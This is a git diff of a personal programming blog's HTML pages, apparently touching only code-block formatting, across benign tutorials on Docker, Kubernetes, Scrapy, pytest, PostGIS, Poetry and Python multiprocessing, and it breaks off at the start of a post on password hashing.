    @@ -291,7 +291,7 @@ 

    Mounting Files

    Port Mapping

    By default no traffic will be routed into a container, meaning a container has it's own set of ports that are not connected to the local PC. Thus we need to set up a mapping between the local PC and the containers ports.

    This is not changed within the Dockerfile, but rather when we run the container with the -p flag. This can be done with:

    -
    1
    docker run -p [local_pc_port] : [container_port] [image_name]
    +
    1
    docker run -p [local_pc_port] : [container_port] [image_name]
     
    @@ -307,7 +307,7 @@

    Docker Compose

  • Create an container that will host a nodejs app
  • Network the ports of the nodejs app container
  • -
    1
    +
    1
     2
     3
     4
    diff --git a/intro-to-games-in-python-with-pyglet.html b/intro-to-games-in-python-with-pyglet.html
    index 11cf2c58..b91a3215 100644
    --- a/intro-to-games-in-python-with-pyglet.html
    +++ b/intro-to-games-in-python-with-pyglet.html
    @@ -176,7 +176,7 @@ 

    Intro to Games in Python with Pygl

    If we run 'asteroid.py' from within the version 3 folder, we are met with this screen

    full_game_screen

    Now since all I am trying to do is generate multiple objects (which will be shown with the player symbol to indicate direction), I can comment out the lines which give the lives, score, title and interactive player.

    -
     1
    +
     1
      2
      3
      4
    @@ -223,13 +223,13 @@ 

    Intro to Games in Python with Pygl

    Now that we've done that, we need to modify the asteroids generator function to use the player sprite.

    In load.py, you can change simply the img argument to the player image sprite reference like so:

    -
    1
    new_asteroid = physicalobject.PhysicalObject(img=resources.player_image,                                                     x=asteroid_x, y=asteroid_y,                                                 batch=batch)
    +
    1
    new_asteroid = physicalobject.PhysicalObject(img=resources.player_image,                                                     x=asteroid_x, y=asteroid_y,                                                 batch=batch)
     

    Now if we run this, the animation will look a little off, because the objects won't be traveling the direction in the direction that the sprite is pointing. This is due to the existing velocity calculation being a random number for both the X and Y component.

    To make the player sprites move in the direction they are rotated in, and maintain the existing codebase, we will need to convert from polar notation to cartesian.

    To do this, we add an extra 2 functions into 'util.py' which will do this for us:

    -
    1
    +
    1
     2
     3
     4
    @@ -250,7 +250,7 @@ 

    Intro to Games in Python with Pygl

    Note the use of radians in pol2cart, this is due to the affect of quadrants and trigonometric functions. I won't go into detail, but it won't behave like you expect it to.

    Now to get our player sprites moving in the direction they are rotated, update the code which generates the 'asteroids' to utilise our new function:

    -
    1
    +
    1
     2
     3
    new_asteroid.rotation = random.randint(0, 360)
     new_asteroid.velocity_speed = random.random() * 40
    diff --git a/intro-to-kubernetes.html b/intro-to-kubernetes.html
    index a0c224c4..9efc4dc0 100644
    --- a/intro-to-kubernetes.html
    +++ b/intro-to-kubernetes.html
    @@ -254,7 +254,7 @@ 

    Update Deployment Images

    This is very challenging, here is a very thorough thread on a conversation discussing ways to do this: https://github.com/kubernetes/kubernetes/issues/33664

    To do this imperatively, we ensure that the image we will be pulling is tagged with versioning on Docker Hub. After this we are able to run the command

    -
    1
    kubectl set image [object_type] / [object_name] [container_name] = [new_image_to_use]
    +
    1
    kubectl set image [object_type] / [object_name] [container_name] = [new_image_to_use]
     

    After running this command, the deployment will update the running pods with the new image.

    diff --git a/intro-to-web-scraping.html b/intro-to-web-scraping.html index b9ef0bc6..71ff9cf0 100644 --- a/intro-to-web-scraping.html +++ b/intro-to-web-scraping.html @@ -233,7 +233,7 @@

    Intro to Web Scraping

    What is Web Scraping

    Web scraping, web harvesting or web data extraction is the process of extracting data from websites. To do this in Python, while there is multiple ways to achieve this (requests + beautiful soup, selenium, etc), my personal favourite package to use is Scrapy. While it may be daunting to begin with from a non object-oriented basis, you will soon appreciate it more once you've begun using it.

    Initially the premise around the Scrapy package is to create 'web spiders'. If we take a look of the structure of the first example on the Scrapy website we get an understanding on how to structure our web spiders when developing:

    -
     1
    +
     1
      2
      3
      4
    @@ -258,7 +258,7 @@ 

    What is Web Scraping

    First of all we can see that the custom spider is essentially an extension of the scrapy.Spider class. It is to be noted that the name and start_urls variables (which are apart of the class) are special in the sense the scrapy package uses them as configuration settings. When it comes to web scraping, if you have had experience using HTML, CSS and/or Javascript, this experience will become extremely useful; that is not to say it is not possible without experience, it's just a learning curve.

    Following on we can see a function for parsing (also specially named) in which there are 2 loops, the first for loop is going to loop through all title's marked as headers (specifically h2) and return a dictionary with the text in the heading.

    -
     1
    +
     1
      2
      3
      4
    @@ -289,7 +289,7 @@ 

    What is Web Scraping

    Now that we have created our spider that looks through each row of the table on the webpage (more information on determining this can be found: https://docs.scrapy.org/en/latest/intro/tutorial.html). It's time to run the spider and take a look at the output. To run a spider you go into the directory from the command line and run 'scrapy crawl \<spider name>' and to store an output at the same time 'scrapy crawl \<spider name> -o filename.csv -t csv.

    Now similar to the previous post, we run a similar analysis and plot with Bokeh!

    -
     1
    +
     1
      2
      3
      4
    diff --git a/introduction-to-pytest-pipenv.html b/introduction-to-pytest-pipenv.html
    index 06528083..d13a66bc 100644
    --- a/introduction-to-pytest-pipenv.html
    +++ b/introduction-to-pytest-pipenv.html
    @@ -163,23 +163,23 @@ 

    Introduction to Pytest & Pipenv

    This post won't go into testing structures for complex applications, but rather just a simple introduction on how to write, run and check the output of a test in Python with pytest.

    As this post is on testing, I also thought it might be quite apt for trialing out a difference package for dependency management. In the past I've used anaconda, virtualenv and just pip, but this time I wanted to try out pipenv.

    Similar to my post Python Project Workflow where I used virtualenv, you must install pipenv in your base Python directory, and typically add the Scripts folder to your path for ease later on. Now all we need to do is navigate to the folder and run:

    -
    1
    pipenv shell
    +
    1
    pipenv shell
     

    This will create a virtual environment somewhere on your computer (unless specified) and create a pipfile in the current folder. The pipfile is a file that essentially describes all the packages used within the project, their version number & so on. This is extremely useful when you pick it back up later on and find where you were at or if you wish to share this with others, they can generate their own virtual environment simply from the pipfile with:

    -
    1
    pipenv install --dev
    +
    1
    pipenv install --dev
     

    Enough about pipenv, let's get onto trying out pytest.

    For this post I will place both my function and it's tests in the same file, however, from my understanding it's best practice to separate them, specifically keeping all tests within an aptly named 'tests' directory for your project/package.

    First off let's define the function we intend to test later:

    -
    1
    +
    1
     2
    def subtract(number_1, number_2):
         return number_1 - number_2
     

    Now we want to test if our function returns 1 if we give it number_1 = 2 and number_2 = 1:

    -
    1
    +
    1
     2
     3
     4
    import pytest
    @@ -189,18 +189,18 @@ 

    Introduction to Pytest & Pipenv

    To run this test, open the pipenv shell like above in the directory of the file where you've written your tests and run:

    -
    1
    pytest file_name.py
    +
    1
    pytest file_name.py
     

    This will output the following:

    image0.png

    Each green dot represents a single test, and we can see that our 1 test passes in 0.02 seconds.

    To get more information from pytest, use the same command with -v (verbose) option:

    -
    1
    pytest file_name.py -v
    +
    1
    pytest file_name.py -v
     

    Now we might want to check that it works for multiple cases, to do this we can use the parametrize functionality of pytest like so:

    -
     1
    +
     1
      2
      3
      4
    diff --git a/linear-regresssion-under-the-hood-with-the-normal-equation.html b/linear-regresssion-under-the-hood-with-the-normal-equation.html
    index 20301330..51fd3e7c 100644
    --- a/linear-regresssion-under-the-hood-with-the-normal-equation.html
    +++ b/linear-regresssion-under-the-hood-with-the-normal-equation.html
    @@ -183,7 +183,7 @@ 

    The Normal Equation

    Where \(\hat{\theta}\) is the value of \(\theta\) that minimises the cost function and \(y\) (once vectorised) is the vector of target values containing \(y^{(1)}\) to \(y^{(m)}\).

    For example if this equation was run on data generated from this formula:

    -
    1
    +
    1
     2
     3
     4
    import numpy as np
    @@ -194,30 +194,30 @@ 

    The Normal Equation

    10_6_2_gen

    Now to compute \(\hat{\theta}\) with the normal equation, we can use the inv() function from NumPy's Linear algebra module:

    -
    1
    +
    1
     2
    X_b = np.c_[np.ones((100,1)),X]
     theta_best = np.linalg.inv(X_b.T.dot(X_b)).dot(X_b.T).dot(y)
     

    With the actual function being \(y = 6 + 2x_0 + noise\), and the equation found:

    -
    1
    +
    1
     2
    array([[ 5.96356419],
            [ 2.00027727]])
     

    Since the noise makes it impossible to recover the exact parameters of the original function now we can use \(\hat{\theta}\) to make predictions:

    -
    1
    y_predict = X_new_b.dot(theta_best)
    +
    1
    y_predict = X_new_b.dot(theta_best)
     

    With y_predict being:

    -
    1
    +
    1
     2
    [[ 5.96356419]
      [ 9.96411873]]
     

    10_6_2_gen_solved

    The equivalent code using Scikit-Learn would look like:

    -
    1
    +
    1
     2
     3
     4
    @@ -229,7 +229,7 @@ 

    The Normal Equation

    And it finds:

    -
    1
    +
    1
     2
     3
    [ 5.96356419] [[ 2.00027727]]
     [[ 5.96356419]
    diff --git a/looking-for-patterns-in-city-names-interactive-plotting.html b/looking-for-patterns-in-city-names-interactive-plotting.html
    index 8986bcd8..c74da8c8 100644
    --- a/looking-for-patterns-in-city-names-interactive-plotting.html
    +++ b/looking-for-patterns-in-city-names-interactive-plotting.html
    @@ -230,7 +230,7 @@ 

    Looking for Pat

    Firstly, we have to find a dataset of all the town names, and I found a database of all world cities names hosted on Kaggle here: https://www.kaggle.com/max-mind/world-cities-database.

    Get the data!

    -
    1
    +
    1
     2
     3
    # data source https://www.kaggle.com/max-mind/world-cities-database
     cities_df = pd.read_csv('./data/worldcitiespop.csv', header=0, sep=',', quotechar='"')
    @@ -238,13 +238,13 @@ 

    Get the data!

    After inspecting the data of this data set, we're able to filter out to look at just New Zealand with the prefix of "nz" in the Country column. It must be noted that this data set represents the names of the towns currently, and not the original Maori names (more on this will be covered in a later post). Now we want to extract the town names out of the dataframe with the ones we want to analyze. For ease later on, we will extract this as a dictionary, such that we can assign the value of each to the count of each letter.

    -
    1
    +
    1
     2
    nz_cities = cities_df[cities_df['Country'] == "nz"]['AccentCity'].tolist()
     nz_dict = { i : 0 for i in nz_cities }
     

    Now we will create an ordered dictionary with the help from the collections package which will store the values of the count for each letter in the town name.

    -
    1
    +
    1
     2
    letters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
     lcount = dict(OrderedDict([(l, 0) for l in letters]))
     
    @@ -258,7 +258,7 @@

    Get the data!

  • Then if the letter does appear, increment the value for that letter by 1.
  • This results in a dictionary for each town name, with the count of repeated letters.

    -
    1
    +
    1
     2
     3
     4
    @@ -272,13 +272,13 @@ 

    Get the data!

    Hooray! Now we have all the data we need broken down and ready for analysis. To help ease the analysis and make it more readable for a human, we convert from our nested dictionaries to a pandas dataframe and transpose it such that we have the town name as the index, the letters as the column and the count of that letter as the values.

    -
    1
    +
    1
     2
    total_df = pd.DataFrame.from_dict(nz_dict)
     total_df = total_df.T
     

    Now we want to find which of these names have the maximum count for any particular letter and store it in a summary dataframe. It is to be noted that we could use the pivot function with aggregate types, however, I have not figured a nice way to do this yet. If you do know a nicer way to determine this, please let me know.

    -
    1
    +
    1
     2
     3
     4
    summary_df = pd.DataFrame()
    @@ -288,7 +288,7 @@ 

    Get the data!

    Now by using the equivalent of an index-match in excel which you can read more about here (https://towardsdatascience.com/name-your-favorite-excel-function-and-ill-teach-you-its-pandas-equivalent-7ee4400ada9f). Admittedly, we could've made the join earlier, but since I use index-match so often in Excel, I wanted to learn how to do the same in pandas. This is achieved by using the map function (which is the equivalent of the index), but by using the index of another dataframe as the argument (the match function), we can rejoin the data set by matching the city name from our original data set.

    -
    1
    +
    1
     2
    summary_df['Latitude'] = summary_df['City_Name'].map(cities_df.set_index(['AccentCity'])['Latitude'].to_dict()) * scale
     summary_df['Longitude'] = summary_df['City_Name'].map(cities_df.set_index(['AccentCity'])['Longitude'].to_dict()) * scale
     
    @@ -301,7 +301,7 @@

    Get the data!

  • the longitude and latitude of the town
  • For plotting with Bokeh on a basemap, we need to convert from longitude & latitude to easting and northing. To do this we use the pyproj package to make this very simple.

    -
    1
    +
    1
     2
     3
     4
    @@ -317,11 +317,11 @@ 

    Get the data!

    This function can be used to generate the easting and northing for every town from it's longitude & latitude and add it to the dataframe.

    -
    1
    summary_df['E'], summary_df['N'] = zip(*summary_df.apply(lambda x: LongLat_to_EN(x['Longitude'], x['Latitude']), axis=1))
    +
    1
    summary_df['E'], summary_df['N'] = zip(*summary_df.apply(lambda x: LongLat_to_EN(x['Longitude'], x['Latitude']), axis=1))
     

    Finally, it's time to plot our findings on a map. Before we initialise the map in Bokeh, for most plots, data tables and more in Bokeh, we need to put it in the ColumnDataSource form. We also initialise the interactivity when the user hovers over the data points on the plot.

    -
     1
    +
     1
      2
      3
      4
    @@ -351,7 +351,7 @@ 

    Get the data!

    Finally time for the plot! Now admittedly, I haven't found an easy way to find the limits of the graph, so this was made with a lot of trial and error (If you know a better way, please let me know!).

    -
    1
    +
    1
     2
     3
     4
    diff --git a/make-a-readme-documentation-with-jupyter-notebooks.html b/make-a-readme-documentation-with-jupyter-notebooks.html
    index 875f17cd..3a4761d1 100644
    --- a/make-a-readme-documentation-with-jupyter-notebooks.html
    +++ b/make-a-readme-documentation-with-jupyter-notebooks.html
    @@ -183,7 +183,7 @@ 

    README.ipynb

    In projects, typically it's best practice to not have to repeat yourself in multiple places (this the DRY principle). In the README, it's nice to have working examples on how a user may use the project. If we could tie the original README with live code that generates the examples, that would be ideal, enter README.ipynb.

    Jupyter supports markdown & code cells, thus all the current documentation in the README.md can be copied within markdown cells. Similarly, the code used to generate examples or demonstrate usage can then be placed in code cells. Allowing the author, to run the entire notebook, generating the new examples & verifying the examples are working code. Fantastic, this is exactly where we want to go.

    Now if you only have the README.ipynb in the repository, GitHub will represent the file in it's raw form, JSON. For example would be hundreds of line like:

    -
     1
    +
     1
      2
      3
      4
    @@ -242,7 +242,7 @@ 

    README.ipynb -> README.md with n

    Python Highlighting in Output

    When first run, it was noticed that nbconvert wasn't marking the code blocks with the language (python). This is required to highlight the code blocks in the README.md with language specifics. The workaround for this, was to use nbconvert's support for custom templates. See the docs at: https://nbconvert.readthedocs.io/en/latest/customizing.html#Custom-Templates.

    The resulting template "pythoncodeblocks.tpl" was:

    -
    1
    +
    1
     2
     3
     4
    @@ -256,7 +256,7 @@ 

    Python Highlighting in Output

    Which could be used with nbconvert with:

    -
    1
    jupyter nbconvert --template "pythoncodeblocks.tpl" --to markdown README.ipynb
    +
    1
    jupyter nbconvert --template "pythoncodeblocks.tpl" --to markdown README.ipynb
     

    Integration into Documentation with Sphinx

    @@ -279,7 +279,7 @@

    Integration into Documentati

    Autosummary generated documentation is included within a separate rst file (developer.rst) to nest all the generated with autosummary within one heading with the ReadTheDocs theme

    index.rst

    -
     1
    +
     1
      2
      3
      4
    @@ -355,7 +355,7 @@ 

    Integration into Documentati

    developer.rst

    -
     1
    +
     1
      2
      3
      4
    diff --git a/making-executable-guis-with-python-gooey-pyinstaller.html b/making-executable-guis-with-python-gooey-pyinstaller.html
    index 06894850..b77a913c 100644
    --- a/making-executable-guis-with-python-gooey-pyinstaller.html
    +++ b/making-executable-guis-with-python-gooey-pyinstaller.html
    @@ -159,7 +159,7 @@ 

    Making Executable

    Today we will go through how to go from a python script to packaged executable with a guided user interface (GUI) for users. First off we still start by writing the scripts that we would like to share with others to be able to use, especially for users that may be uncomfortable in a programming environment and would feel at home with a GUI.

    My personal favourite part about Gooey, is that you are essentially creating a command line interface (CLI) tool, which Gooey then uses to generate a GUI. This eliminates having two separate code bases to facilitate CLI & GUI users, which can be very painful at times.

    -
     1
    +
     1
      2
      3
      4
    @@ -216,7 +216,7 @@ 

    Making Executable

    The 2 functions defined above are for getting information of selected files, or returning a list of files found within a folder (and subfolders).

    Now to use Gooey, we need to define a 'main' function for parsing the arguments for the GUI to generate controls. As Gooey is based on the argparse library, if you have previously built CLI tools with argparse, the migration to Gooey is quite simplistic. However as there is always edge cases, ensure to check your tools functionality once you have developed it.

    -
     1
    +
     1
      2
      3
      4
    @@ -264,7 +264,7 @@ 

    Making Executable

    By using the Gooey decorator we are able to define many different layout options for our GUI. Since we are trying to enable users to use multiple scripts which are different and separate, I personally like to the optional columns layout, but there are many other types of layouts which can be seen here: https://github.com/chriskiehl/Gooey#layout-customization.

    Following this we create our argument parsing function, and in which we define parsers, subparsers and add the arguments. This post will not be covering how to write CLIs, but it is on the list for future posts.

    To complete the script, we need to put in the functionality at startup.

    -
    1
    +
    1
     2
     3
     4
    @@ -287,7 +287,7 @@ 

    Making Executable

    This will then generate a build folder and a dist folder within your current directory. The build folder will contain all the files used in generating the executable, which is found within the dist folder.

    image-20191102174758361

    The code in it's entirety is:

    -
     1
    +
     1
      2
      3
      4
    diff --git a/migrating-from-wordpress-to-pelican.html b/migrating-from-wordpress-to-pelican.html
    index 2788499c..842c19e6 100644
    --- a/migrating-from-wordpress-to-pelican.html
    +++ b/migrating-from-wordpress-to-pelican.html
    @@ -184,12 +184,12 @@ 

    Themes

    http://www.pelicanthemes.com/

    Which lets you scroll through the various themes, and even links to the repository on github for the theme if you wish to use it. The theme I decided on was Flex by Alexandre Vicenzi.

    Apply the the theme was as simple as cloning the repo (or using git submodules), and adding one line of code in pelicanconf.py (generated automatically by pelican-quickstart).

    -
    1
    THEME = "./themes/Flex"
    +
    1
    THEME = "./themes/Flex"
     

    Plugins

    Admittedly, I just tried out all the plugins in the Pelican Plugins Repository until I found the combination that works for me, this ended up being:

    -
     1
    +
     1
      2
      3
      4
    @@ -237,7 +237,7 @@ 

    Wordpress Import

    Now that I had the skeleton of the website set up, I needed to bring in all the existing posts from wordpress. By following another guide within the Pelican documentation, this was a relatively simple task http://docs.getpelican.com/en/3.6.3/importer.html. However, I did spend the time to go through and edit each markdown to remove redundant 'wordpress' formatting tags manually.

    Linking to Content

    As one of the main tasks of this project was to consolidate articles with the content/code/analysis in one spot, initially in development following the guide in http://docs.getpelican.com/en/3.6.3/content.html.

    -
    1
    +
    1
     2
     3
     4
    @@ -257,7 +257,7 @@ 

    Linking to Content

    I ended up with a structure like above, which annoyed me a bit as now the content was in one place, but still divided into 3 folders with little-to-no link between them, my goal was to have the structure like:

    -
     1
    +
     1
      2
      3
      4
    @@ -285,7 +285,7 @@ 

    Travis CI

    To be honest, I was actually surprised at how easy it was to turn Travis CI and that I could spin up a virtual machine, install all the dependencies and re-build the website. However, I had a lot of trouble trying to get Travis CI to push back to the repository such that Netlify could build from it.

    This was later remedied by setting a repository secret variable on Travis CI as I couldn't get the secret token encrypted by Travis CI CLI (Ruby application).

    In essence, all that was needed was a .travis.yml file in the root directory which ended up like this:

    -
     1
    +
     1
      2
      3
      4
    diff --git a/ml-agents-for-unity-on-apple-silicon-m1m2m3.html b/ml-agents-for-unity-on-apple-silicon-m1m2m3.html
    index 160999f5..233aa2bb 100644
    --- a/ml-agents-for-unity-on-apple-silicon-m1m2m3.html
    +++ b/ml-agents-for-unity-on-apple-silicon-m1m2m3.html
    @@ -166,21 +166,21 @@ 

    Miniconda

    Miniconda was set up through the installation instructions listed on the website for Miniconda3 macOS Apple M1 64-bit pkg:

    https://docs.conda.io/en/latest/miniconda.html

    Following this, the conda-forge is added as a channel (instructions from https://conda-forge.org/docs/user/introduction.html):

    -
    1
    +
    1
     2
    conda config --add channels conda-forge
     conda config --set channel_priority strict
     

    Conda environment

    Big thank you to this github thread (and user @automata) for finally leading me down a successful path https://github.com/Unity-Technologies/ml-agents/issues/5797:

    -
    1
    conda create -n mlagents python==3.10.7
    +
    1
    conda create -n mlagents python==3.10.7
     

    Ensure to download the release specifically that you are targetting which are managed by branches on the repo. IE https://github.com/Unity-Technologies/ml-agents/tree/latest_release. If you are using the gh CLI gh repo clone Unity-Technologies/ml-agents -- --branch release_20

    Next we need to edit setup.py found in ml-agents-release_20/ml-agents/setup.py, specifically line 71 to:

    -
    1
    "torch>=1.8.0,<=1.12.0;(platform_system!='Windows' and python_version>='3.9')"
    +
    1
    "torch>=1.8.0,<=1.12.0;(platform_system!='Windows' and python_version>='3.9')"
     

    Now we install the ml-agents package (which has a dependancy of torch) through the locally edited version:

    @@ -188,7 +188,7 @@

    Conda environment

    Theoretically, this is where we should've been done and been able to run mlagents-learn without any more problems, but that wasn't the case. The next error we run into is:

    TypeError: Descriptors cannot not be created directly.

    Which was resolved through https://stackoverflow.com/questions/72441758/typeerror-descriptors-cannot-not-be-created-directly

    -
    1
    pip install protobuf~=3.20
    +
    1
    pip install protobuf~=3.20
     
    @@ -200,7 +200,7 @@

    Conda environment

    ImportError: dlopen(/Users/jackmckew/miniconda3/envs/mlagentstest/lib/python3.10/site-packages/grpc/_cython/cygrpc.cpython-310-darwin.so, 0x0002): symbol not found in flat namespace '_CFRelease'

    Which was resolved through https://stackoverflow.com/questions/72620996/apple-m1-symbol-not-found-cfrelease-while-running-python-app

    -
    1
    +
    1
     2
    pip uninstall grpcio -y
     conda install grpcio -y
     
    @@ -210,7 +210,7 @@

    Conda environment

    Finally we can run:

    mlagents-learn

    To be met with this glorious screen

    -
     1
    +
     1
      2
      3
      4
    diff --git a/optimization-gotchas-in-postgis-for-geospatial-queries.html b/optimization-gotchas-in-postgis-for-geospatial-queries.html
    index 638ba072..01d4b559 100644
    --- a/optimization-gotchas-in-postgis-for-geospatial-queries.html
    +++ b/optimization-gotchas-in-postgis-for-geospatial-queries.html
    @@ -168,7 +168,7 @@ 

    Load

    ogr2ogr -f "PostgreSQL" PG:"dbname=postgres user=postgres password=root host=localhost" "water_polygons.shp" -progress -overwrite -nlt PROMOTE_TO_MULTI -nln water

    Generate points

    Now that we have our polygons loaded into a table, we need to generate points to be evaluated:

    -
    1
    +
    1
     2
     3
     4
    @@ -183,7 +183,7 @@ 

    Generate points

    Baseline test

    Our baseline test of a point in polygon spatial join: count how many points are within each polygon, can demonstrate the effectiveness of indexing, point in polygon calculations and general overhead. By using the EXPLAIN ANALYZE operator in PostgreSQL, we can look into the inner workings of how the database plans and executes the query, along with how long the query took. We'll also take only 50% of the points as querying the entire table defeats the purpose of this task.

    -
    1
    +
    1
     2
     3
     4
    @@ -197,7 +197,7 @@ 

    Baseline test

    By running without any of the following optimizations, we get the result of:

    -
     1
    +
     1
      2
      3
      4
    @@ -233,7 +233,7 @@ 

    Baseline test

    Optimize Techniques

    Set the page size

    Kudos to Paul Ramsey source for demonstrating the effectiveness of setting the page size for postgresql (and by extension PostGIS). As the default for postgresql is to use a set amount of page size of internal memory, this results in the database only allowed to use a set amount of memory to process queries which inherently does not leverage the computing power that we have on our machines. By allowing postgresql to use external memory, this not only leverages the memory available but should also improve our query performance.

    -
    1
    +
    1
     2
     3
     4
    @@ -247,7 +247,7 @@ 

    Set the page size

    By running the baseline test again:

    -
     1
    +
     1
      2
      3
      4
    @@ -289,11 +289,11 @@ 

    Set the page size

    Create a spatial index

    One technique that should always be used in databases is indexing, especially for geospatial databases. Creating an index on our database is as simple as:

    -
    1
    CREATE INDEX geometry_index ON water USING GIST(wkb_geometry);
    +
    1
    CREATE INDEX geometry_index ON water USING GIST(wkb_geometry);
     

    This works by computing the bounding box of each geometry in the dataset, and whenever a query comes in that wishes to evaluate against the geometries (ie, intersection), the query resolver will first reduce the query only to geometries which bounding box first passes the query before continuing to include the entire geometry.

    -
     1
    +
     1
      2
      3
      4
    diff --git a/packaging-python-packages-with-poetry.html b/packaging-python-packages-with-poetry.html
    index 998c62c5..904729d5 100644
    --- a/packaging-python-packages-with-poetry.html
    +++ b/packaging-python-packages-with-poetry.html
    @@ -192,7 +192,7 @@ 

    What is Poetry

    Package Structure

    Python packages require a standard structure (albeit lenient), which Poetry sets up for you when a project is initialized. If we run poetry new test_package we will end up with the structure:

    -
    1
    +
    1
     2
     3
     4
    @@ -239,7 +239,7 @@ 

    Package Structure

    __init__.py Files

    What are all these __init__.py files and what are they there for? To be able to import code from another folder, Python requires to see an __init__.py inside a folder to mark it as a package.

    If we create a function inside our test_package folder:

    -
    1
    +
    1
     2
     3
    +-- test_package
     |   +-- __init__.py
    @@ -254,13 +254,13 @@ 

    Wordsum - My First Package

    If you have read this blog previously, I did a post on answering the question "How many words have I written in this blog?" which you can reach at: https://jackmckew.dev/counting-words-with-python.html.

    This was great, I had wrote 2 functions which count how many words were inside markdown files & Jupyter notebooks. Following this, I had a great idea, why not make a 'ticker' of how many words have been written in this blog and display this on the website. Making sure that whenever a new post is added the 'word ticker' increments by how many words were in that post.

    This in the inspiration behind Wordsum which is also available on PyPI. Meaning you can install it with:

    -
    1
    pip install wordsum
    +
    1
    pip install wordsum
     

    Wordsum Package Structure

    To make the two functions more extensible, the two functions were further broken into smaller functions and contained in their own 'internal' package (folder).

    The basic structure we ended up with was:

    -
     1
    +
     1
      2
      3
      4
    @@ -291,7 +291,7 @@ 

    Wordsum Package Structure

    The main functions of the package are kept within word_sum.py (which uses the functions in the _xxx folders).

    User Interaction

    To make the main functions within word_sum.py accessible to users of the package we can import them in the 'top' __init__.py of the wordsum package.

    -
    1
    +
    1
     2
     3
     4
    @@ -303,7 +303,7 @@ 

    User Interaction

    This will allow users to interact with the package like:

    -
    1
    +
    1
     2
     3
     4
    @@ -316,7 +316,7 @@ 

    User Interaction

    Publishing to PyPI

    Since we've used Poetry with the development of this package, our pyproject.toml should be a bit more fleshed out. Wordsum's pyproject.toml ended up as:

    -
     1
    +
     1
      2
      3
      4
    @@ -368,12 +368,12 @@ 

    Publishing to PyPI

    All that is left to do is to sign up for an account on PyPI and run:

    -
    1
    poetry publish
    +
    1
    poetry publish
     

    This will ask for your PyPI credentials, build the package (a step done by setuptools previously) and upload the package for you.

    Now users can install your package with:

    -
    1
    pip install wordsum
    +
    1
    pip install wordsum
     

    Integrating Wordsum Into This Website

    @@ -382,7 +382,7 @@

    Integrating Wordsum Into This Web

    So there was only 3 files that I needed to edit: pelicanconf.py, requirements.txt and a html file for the theme. pelicanconf.py contains all the instructions to provide to pelican when building the site, requirements.txt contains the list of packages required for TravisCI to use and the template html file is how it is to represented on the web.

    Update requirements.txt

    First off we add wordsum to the virtual environment for the project and freeze it within requirements.txt with

    -
    1
    +
    1
     2
    pip install wordsum
     pip freeze requirements.txt
     
    @@ -392,7 +392,7 @@

    Update requirements.txt

    Update pelicanconf.py

    This file contains the code that will run when pelican content is called upon the folder to build this website. To interface with wordsum we add the code:

    -
    1
    +
    1
     2
     3
     4
    import wordsum
    @@ -407,7 +407,7 @@ 

    Update pelicanconf.py

    Update base.html

    Now we just need to show our word ticker on the website. In the Flex theme, all pages inherit from a base.html file. To squeeze our new metrics onto the page we add the lines:

    -
    1
    +
    1
     2
     3
     4
    {% if WORD_TICKER %}
    diff --git a/parallel-processing-in-python.html b/parallel-processing-in-python.html
    index 236cb581..4f12c9e4 100644
    --- a/parallel-processing-in-python.html
    +++ b/parallel-processing-in-python.html
    @@ -160,7 +160,7 @@ 

    Parallel Processing in Python

    Parallel processing is a mode of operation where the task is executed simultaneously in multiple processors in the same computer. The purpose of this is intended to reduce the overall processing time, however, there is often overhead between communicating processes. For small tasks, the overhead is detrimental to the length of processing, increasing the overall time taken.

    For this post we will be using the multiprocessing package in Python. Multiprocessing is apart of the standard library within Python and is a package that supports spawning processes using an API similar to the threading module (also apart of the standard library). The main benefit of the multiprocessing package, is that it disregards the global interpreter lock (GIL), by using sub processes instead of threads.

    The number of processors or threads in your computer dictates the maximum number of processes you can run at a time. To add flexibility to your program when it may be run across multiple machines, it is good practice to make use of the cpu_count() function apart of the multiprocessing, as shown below (please note f strings were only introduced in Python 3.6).

    -
    1
    +
    1
     2
    import multiprocessing as mp
     print(f"Maximum number of processes: {mp.cpu_count()}")
     
    @@ -176,7 +176,7 @@

    The Pool Class

  • Pool.map_async
  • Before we tackle the asynchronous variants of the pool methods (async suffix). Here is a simple example using Pool.apply and Pool.map. We initialize the number of processes to however many is available or the maximum of the system.

    -
    1
    +
    1
     2
     3
     4
    @@ -190,7 +190,7 @@ 

    The Pool Class

    With the results being: [1, 2, 9, 64] or 1\^0, 2\^1,3\^2,4\^3. This can also be achieved similarly with Pool.map.

    -
    1
    +
    1
     2
     3
     4
    @@ -204,7 +204,7 @@ 

    The Pool Class

    Both of these will lock the main program that is calling them until all processes in the pool are finished, use this if you want to obtain results in a particular order. However if you don't care about the order and want to retrieve results as soon as they finished, then use the async variant.

    -
    1
    +
    1
     2
     3
     4
    @@ -221,7 +221,7 @@ 

    The Pool Class

    The Process Class

    The process class is the most basic approach to parallel processing from multiprocessing package. Here we will use a simple queue function to generate 10 random numbers in parallel.

    -
     1
    +
     1
      2
      3
      4
    diff --git a/portfolio-balancing-with-historical-stock-data.html b/portfolio-balancing-with-historical-stock-data.html
    index 6a19c79e..9ff29199 100644
    --- a/portfolio-balancing-with-historical-stock-data.html
    +++ b/portfolio-balancing-with-historical-stock-data.html
    @@ -173,7 +173,7 @@ 

    Portfolio Balancing with
  • Pick the desired solution.
  • To generate random portfolios, we define a function such that we can pass it differing variables as to tweak our outcomes in the future.

    -
     1
    +
     1
      2
      3
      4
    @@ -211,7 +211,7 @@ 

    Portfolio Balancing with

    \
 Assessing the riskiness of a portfolio with Python

    Bernard Brenyah, whom I mentioned at the beginning of the post, has provided a clear explanation of how the above formula can be expressed in matrix calculation in one of his blog posts. In which we just take the matrix calculation and multiply by 253 for number of trading days in Australia.

    -
    1
    +
    1
     2
     3
     4
    @@ -223,7 +223,7 @@ 

    Portfolio Balancing with

    Now that we have X number of randomly generated portfolios, all ranked against one another, it's time to plot so that our results can be visualized.

    -
     1
    +
     1
      2
      3
      4
    @@ -297,7 +297,7 @@ 

    Portfolio Balancing with

    Using the above function 'display_random_efficient_frontier', this will determine our max sharpe ratio portfolio generated and the minimum volatility portfolio with their respective returns. Now it is entirely up to the trader on how much risk they are willing to take on board with their portfolio. With the settings below in conjunction with the previously defined functions and stock data to generate the portfolios (risk free rate determined from this website).

    -
    1
    +
    1
     2
     3
     4
    diff --git a/python-and-data-security-hashing-algorithms.html b/python-and-data-security-hashing-algorithms.html
    index 589a426f..bd3aaab1 100644
    --- a/python-and-data-security-hashing-algorithms.html
    +++ b/python-and-data-security-hashing-algorithms.html
    @@ -224,11 +224,11 @@ 

    Using hashes with Python

    From this, we will use the argon2 hashing algorithm. As normal, it is best practice to set up a virtual environment (or conda environment) and install the dependencies, in this case passlib.

    First of all, import the hashing algorithm you wish to use from the passlib package:

    -
    1
